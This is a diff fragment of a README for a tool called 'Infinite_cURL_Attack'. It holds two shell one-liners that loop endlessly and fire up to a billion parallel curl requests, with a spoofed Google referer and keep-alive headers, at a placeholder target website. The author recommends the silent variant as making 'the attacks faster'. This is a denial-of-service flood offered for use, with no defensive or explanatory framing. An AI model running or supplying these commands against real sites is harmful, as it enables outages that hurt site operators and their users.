g-h-0-S-t/Infinite_cURL_Attack/README.md

 while (true); do seq 1 1000000000 | xargs -n1 -P 1000000000 curl -I -i -v -H "Connection: keep-alive" -H "Referer: https://google.com" "https://Your.Target.Website.com"; done;
 ```

-If you don't want logs in your terminal and make the attacks faster, do this:
+If you don't want logs in your terminal and make the attacks faster, do this (**the following is my preference**):

 ```
 while (true); do seq 1 1000000000 | xargs -n1 -P 1000000000 curl -s -H "Connection: keep-alive" -H "Referer: https://google.com" "https://Your.Target.Website.com" > /dev/null; done;